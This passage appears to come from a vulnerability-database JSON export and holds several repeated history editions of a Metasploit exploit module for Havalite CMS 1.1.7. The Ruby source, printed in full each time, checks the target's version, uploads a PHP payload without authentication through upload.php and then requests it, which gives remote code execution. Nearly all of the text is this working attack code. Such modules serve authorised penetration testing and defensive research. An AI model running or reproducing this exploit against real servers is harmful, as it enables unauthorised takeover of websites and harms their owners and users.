[\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-06T20:14:55", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-06T22:15:01", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-06T22:15:01", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-06T22:15:01", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-07T14:15:16", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-07T14:15:16", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-07T14:15:16", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-07T16:10:42", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-07T16:10:42", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-07T16:10:42", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-22T15:04:01", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-22T15:04:01", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-22T15:04:01", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-22T17:00:51", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-22T17:00:51", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-22T17:00:51", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-25T08:56:38", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-25T08:56:38", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-25T08:56:38", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], 